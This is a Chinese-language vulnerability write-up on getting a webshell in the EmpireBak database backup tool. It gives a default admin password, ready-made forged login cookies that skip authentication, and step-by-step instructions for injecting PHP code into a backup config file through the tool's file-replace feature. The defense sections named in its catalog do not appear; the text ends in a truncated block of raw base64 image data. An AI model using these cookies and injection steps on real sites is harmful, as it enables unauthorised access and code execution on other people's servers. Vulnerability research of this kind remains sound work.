帝国备份王(Empirebak) \class\functions.php、\class\combakfun.php GETSHELL vul

时间:2022-09-22 16:38:45

catalog

. 漏洞描述
. 漏洞触发条件
. 漏洞影响范围
. 漏洞代码分析
. 防御方法
. 攻防思考

1. 漏洞描述

EmpireBak是一款完全免费、专门为Mysql大数据的备份与导入而设计的软件,系统采用分卷备份与导入,理论上可备份任何大小的数据库,帝国备份王(Empirebak)存在较多GETSHELL漏洞,本文逐一讨论从进入后台到GETSHELL的各种方式

Relevant Link:

http://help.aliyun.com/knowledge_detail.htm?knowledgeId=5980885&categoryId=8314968

2. 漏洞触发条件

0x1: 默认弱口令进入后台

admin

//默认安装弱口令

0x2: 伪造cookie登录后台

ebak_loginebakckpass:119770adb578053dcb383f67a81bcbc6
ebak_bakrnd:35y5cCnnA4Kh
ebak_bakusername:admin
ebak_baklogintime:
//使用以上cookie即可直接访问admin.php

使用firefox tamper data代理截包,访问下列网址

http://localhost/EmpireBak2010/admin.php
http://localhost/EmpireBak2010/DoSql.php

在tamper data暂停的时候,修改cookie值,如果不存在就添加cookie这一项,可以直接免登进入指定后台页面

Cookie=ebak_loginebakckpass=119770adb578053dcb383f67a81bcbc6;ebak_bakrnd=35y5cCnnA4Kh;ebak_bakusername=admin;ebak_baklogintime=

0x3: 后台"管理备份目录"创建xx.asp目录进行IIS解析漏洞GETSHELL

在新版帝国备份cms中已经修复,并且这个漏洞需要目标服务器是IIS,才存在这个漏洞,在实际情况中,大多数是PHP+APACHE的架构

0x4: 备份数据、替换目录文件内容GETHSLL

. 登陆后先备份一次数据
. 备份时可选择备份到的目录,默认有个safemod
. 备份完毕后来到"管理备份目录",打包并下载
//备份后的safemod目录下所有的表都是以PHP保存的
. 查看下载下来的备份文件的内容
. Empirebak"管理备份目录"下有个替换文件内容功能,选择和刚才下载的同一个目录,点击替换文件内容:http://www.xxx.com/diguo/RepFiletext.php?mypath=safemod
. 例如替换config.php的内容
/*
<?php
$b_table="ecs_ad_custom";
$tb[ecs_ad_custom]=1; $b_baktype=0;
$b_filesize=300;
$b_bakline=500;
$b_autoauf=1;
$b_dbname="test";
$b_stru=1;
$b_strufour=0;
$b_dbchar="auto";
$b_beover=0;
$b_insertf="replace";
$b_autofield=",,";
$b_bakdatatype=0;
?>
*/
将字符: $b_bakdatatype=;
替换为:
$b_bakdatatype=;
phpinfo();
. http://xxx/diguo/bdata/safemod/config.php
显示phpinfo内容,GETSHELL成功

aaarticlea/png;base64,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